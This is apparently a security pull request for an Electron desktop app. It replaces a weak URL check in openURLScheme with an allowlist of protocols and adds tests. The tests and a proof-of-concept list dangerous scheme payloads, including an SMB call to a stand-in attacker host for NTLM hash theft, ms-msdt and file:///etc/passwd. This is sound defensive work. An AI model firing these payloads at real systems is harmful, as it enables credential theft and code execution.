### PR TITLE
fix(desktop/ipc): allowlist URL scheme protocols in openURLScheme

### DIFF
--- a/apps/desktop/layer/main/src/ipc/services/integration.test.ts
+++ b/apps/desktop/layer/main/src/ipc/services/integration.test.ts
@@ -1,8 +1,9 @@
 import fsp from "node:fs/promises"
 import os from "node:os"
 
+import { shell } from "electron"
 import path from "pathe"
-import { afterEach, describe, expect, it, vi } from "vitest"
+import { afterEach, beforeEach, describe, expect, it, vi } from "vitest"
 
 import { IntegrationService } from "./integration"
 
@@ -68,5 +69,73 @@ describe("IntegrationService", () => {
     await expect(
       fsp.stat(path.join(vaultPath, "KAWA DESIGN 少女前线2：追放 索米·雪兔献礼 1")),
     ).rejects.toThrow()
+  })
+
+  describe("openURLScheme", () => {
+    const openExternalMock = vi.mocked(shell.openExternal)
+
+    beforeEach(() => {
+      openExternalMock.mockReset()
+      openExternalMock.mockResolvedValue()
+    })
+
+    it("rejects input that cannot be parsed as a URL", async () => {
+      const service = new IntegrationService()
+
+      await expect(service.openURLScheme("not-a-url")).rejects.toThrow(
+        /Invalid URL scheme/i,
+      )
+      expect(openExternalMock).not.toHaveBeenCalled()
+    })
+
+    // These are the dangerous protocols that previously slipped through the
+    // "contains ://" guard and reached shell.openExternal verbatim.
+    // shell.openExternal docs explicitly warn that passing untrusted URLs is
+    // unsafe — file://, smb://, search-ms:, ms-msdt:, jar:, res:, etc. have
+    // been used in real-world RCE / NTLM-credential-theft chains.
+    it.each([
+      ["file:///etc/passwd"],
+      ["FILE:///etc/passwd"],
+      ["smb://attacker.example/share"],
+      ["jar:http://attacker.example/x.jar!/"],
+      ["res://shell32.dll/1"],
+      ["ms-msdt:/id PCWDiagnostic"],
+      ["search-ms:query=secret"],
+      ["javascript:alert(1)"],
+      ["data:text/html,<script>alert(1)</script>"],
+      ["vbscript:msgbox(1)"],
+    ])(
+      "blocks dangerous scheme %s and does not invoke shell.openExternal",
+      async (dangerousScheme) => {
+        const service = new IntegrationService()
+
+        await expect(service.openURLScheme(dangerousScheme)).rejects.toThrow(
+          /not allowed|disallowed|not permitted/i,
+        )
+        expect(openExternalMock).not.toHaveBeenCalled()
+      },
+    )
+
+    // The integration UI ships these schemes as built-in examples
+    // (see url-scheme-handler.ts#getExamples) plus generic web/mail.
+    // They must keep working after the fix.
+    it.each([
+      ["https://example.com"],
+      ["http://example.com/path?q=1"],
+      ["mailto:user@example.com"],
+      ["obsidian://new?vault=MyVault&name=Test"],
+      ["bear://x-callback-url/create?title=Test"],
+      ["things:///add?title=Test"],
+      ["notion://new?title=Test"],
+      ["x-devonthink://createText?title=Test"],
+      ["drafts://x-callback-url/create?text=Test"],
+    ])("permits known integration scheme %s", async (allowedScheme) => {
+      const service = new IntegrationService()
+
+      await expect(service.openURLScheme(allowedScheme)).resolves.toEqual({
+        success: true,
+      })
+      expect(openExternalMock).toHaveBeenCalledWith(allowedScheme)
+    })
   })
 })

--- a/apps/desktop/layer/main/src/ipc/services/integration.ts
+++ b/apps/desktop/layer/main/src/ipc/services/integration.ts
@@ -81,6 +81,29 @@ export async function saveMediaToEagle(input: SaveToEagleInput): Promise<any> {
   }
 }
 
+// Allowlist of URL scheme protocols that `openURLScheme` is permitted to hand
+// off to `shell.openExternal`. The list intentionally covers the integrations
+// shipped in the UI (Obsidian, Bear, Drafts, Things, Notion, DEVONthink) plus
+// generic web/mail schemes, while excluding dangerous protocols such as
+// `file:`, `smb:`, `ms-msdt:`, `search-ms:`, `jar:`, `res:`, `javascript:`,
+// `data:`, `vbscript:`, which have known abuse chains when invoked from
+// untrusted content.
+const ALLOWED_URL_SCHEME_PROTOCOLS = new Set<string>([
+  "http",
+  "https",
+  "mailto",
+  "obsidian",
+  "bear",
+  "drafts",
+  "things",
+  "notion",
+  "x-devonthink",
+])
+
+function isAllowedURLSchemeProtocol(protocol: string): boolean {
+  return ALLOWED_URL_SCHEME_PROTOCOLS.has(protocol)
+}
+
 export class IntegrationService extends IpcService {
   static override readonly groupName = "integration"
 
@@ -382,9 +405,30 @@ ${content}
     const requestId = Math.random().toString(36).slice(2, 8)
 
     try {
-      // Validate URL scheme format
-      if (!scheme.includes("://")) {
+      // Parse and validate the protocol up-front. `shell.openExternal` will
+      // happily dispatch any scheme the OS has registered a handler for,
+      // including `file://`, `smb://`, `ms-msdt:`, `search-ms:`, `jar:`,
+      // `res:`, etc. Several of those have well-documented exploit chains
+      // (NTLM credential theft over SMB, MSDT/Follina RCE on Windows,
+      // local-file disclosure via file://). The Electron docs explicitly
+      // warn against passing untrusted URLs to `shell.openExternal`, so we
+      // enforce a strict allowlist of schemes that the integrations UI is
+      // intended to support.
+      let protocol: string
+      try {
+        protocol = new URL(scheme).protocol.replace(/:$/, "").toLowerCase()
+      } catch {
         throw new Error("Invalid URL scheme format. Must include protocol (e.g., 'app://')")
+      }
+
+      if (!protocol) {
+        throw new Error("Invalid URL scheme format. Must include protocol (e.g., 'app://')")
+      }
+
+      if (!isAllowedURLSchemeProtocol(protocol)) {
+        throw new Error(
+          `URL scheme "${protocol}://" is not allowed. Allowed schemes: ${[...ALLOWED_URL_SCHEME_PROTOCOLS].sort().join(", ")}.`,
+        )
       }
 
       // Log URL scheme execution (mask sensitive data)
@@ -399,7 +443,7 @@ ${content}
 
       logger.info(`[URLScheme:${requestId}] Opening URL scheme`, {
         scheme: safeScheme,
-        protocol: scheme.split("://")[0],
+        protocol,
       })
 
       // Use Electron's shell.openExternal to open URL scheme


### PR DESCRIPTION
### Description

The `integration.openURLScheme` IPC method in the desktop main process invokes `shell.openExternal` on a renderer-supplied string after only checking that the string contains `"://"`. Electron's documentation explicitly warns that passing untrusted input to `shell.openExternal` is unsafe: schemes such as `file://`, `smb://`, `ms-msdt:`, `search-ms:`, `jar:`, `res:`, `javascript:`, `data:` and `vbscript:` have well-documented abuse chains (local file disclosure, NTLM credential theft over SMB on Windows, MSDT/Follina-style RCE, etc.).

This PR replaces the substring check with strict `URL` parsing plus an allowlist of the schemes the integrations UI is actually intended to support (`obsidian`, `bear`, `drafts`, `things`, `notion`, `x-devonthink`) plus generic `http`, `https`, and `mailto`. Any other protocol is rejected with a clear error before reaching `shell.openExternal`.

### PR Type

- [x] Bugfix (security hardening)

### Vulnerability details

- **File:** `apps/desktop/layer/main/src/ipc/services/integration.ts`
- **Method:** `IntegrationService.openURLScheme` (invoked over IPC from the renderer at `apps/desktop/layer/renderer/src/modules/integration/url-scheme-handler.ts:72`)
- **Weakness:** CWE-78 / CWE-20 — insufficient validation of a value that reaches an OS-level "open handler for URL" primitive.
- **Data flow:** renderer → `ipcServices.integration.openURLScheme(scheme)` → main → `shell.openExternal(scheme)`. The only pre-existing check was `scheme.includes("://")`, which permits `file://`, `smb://`, `jar:http://…`, etc.
- **Threat model:** any XSS sink in the renderer (RSS/feed content is inherently untrusted), or a malicious "URL scheme" template a user has been convinced to configure in the Custom Integration modal, can call this IPC. On Windows in particular, `smb://attacker/share` leaks the user's NTLM hash to an attacker-controlled host on a single click; `ms-msdt:` and `search-ms:` have historical RCE chains; `file:///…` allows unwanted local resource access.

### Fix rationale

- Parse the input with `new URL(scheme)` so we get a real, normalized protocol rather than a substring guess. Invalid inputs throw and are rejected.
- Lowercase and strip the trailing `:` from the protocol, then check membership against a `Set` allowlist. The allowlist covers exactly the schemes that ship as built-in examples in the integrations UI (`url-scheme-handler.ts` examples: Obsidian, Bear, Drafts, Things, Notion, DEVONthink) plus `http`/`https`/`mailto` for the generic "open link" cases.
- Rejection returns a descriptive error listing the permitted schemes, so a user misconfiguring a custom integration gets an actionable message instead of a silent open of the wrong handler.
- No allowed workflow is regressed: everything the UI already documents as a valid example continues to work.

### Tests

Added vitest coverage in `apps/desktop/layer/main/src/ipc/services/integration.test.ts`:

- Rejects unparseable input (`"not-a-url"`) without invoking `shell.openExternal`.
- Blocks representative dangerous schemes and asserts `shell.openExternal` is **not** called: `file:///etc/passwd`, `FILE:///…` (case), `smb://…`, `jar:http://…!/`, `res://shell32.dll/1`, `ms-msdt:/id PCWDiagnostic`, `search-ms:query=…`, `javascript:`, `data:text/html,…`, `vbscript:`.
- Permits every scheme that appears as a built-in example in `url-scheme-handler.ts` plus generic `http`/`https`/`mailto`, and asserts the exact string is forwarded to `shell.openExternal`.

Run locally with:

```
pnpm --filter @follow/electron-main test integration.test.ts
```

### Proof of concept

From a rendered feed item (or any renderer context that can execute JS — the primary concern here is a stored-XSS gadget in third-party feed content), the following call previously reached `shell.openExternal` verbatim and, on Windows, would exfiltrate the user's NTLM hash to `attacker.example`:

```ts
// In renderer context, pre-fix:
await window.ipcServices.integration.openURLScheme("smb://attacker.example/share")
// Passed the `.includes("://")` check → shell.openExternal("smb://…") → SMB auth attempt.
```

After this PR the same call throws `URL scheme "smb://" is not allowed. Allowed schemes: bear, drafts, http, https, mailto, notion, obsidian, things, x-devonthink.` and `shell.openExternal` is never invoked. The vitest suite reproduces this deterministically without needing a Windows host — it asserts on the mock.

### Adversarial review

Before submitting, we tried to disprove this finding. The relevant questions were:

1. **Is there a renderer-side guard that already sanitizes the scheme?** No. `url-scheme-handler.ts` builds `finalScheme` from user-configured templates and passes it straight to the IPC. The only gate was the substring check inside the main process.
2. **Does the non-Electron web build reach `shell.openExternal`?** No — the web build routes through `window.open`, which honors the browser's own scheme policies. The vulnerable path only exists in the desktop (Electron) build, which the PR correctly targets.
3. **Is context isolation enough on its own?** Context isolation prevents renderer→main memory tampering but does not prevent the renderer from calling a legitimately exposed IPC with attacker-controlled arguments — that's exactly the misuse here.
4. **Would the allowlist break a real integration?** Cross-checked against every scheme listed as a built-in example in `url-scheme-handler.ts`; all are covered. Users adding custom URL-scheme integrations for other apps will need those schemes added to the allowlist, which is the intended behavior for a security boundary.

### Linked Issues

None — reporting directly via PR per `SECURITY.md` (a security advisory could also be filed, but the fix diff is small and self-contained, so we're proposing it publicly here).

### Additional context

The fix is intentionally minimal: two files changed, ~117 lines including tests. No dependency changes, no changes to renderer code, no changes to the IPC contract (same method signature and return shape).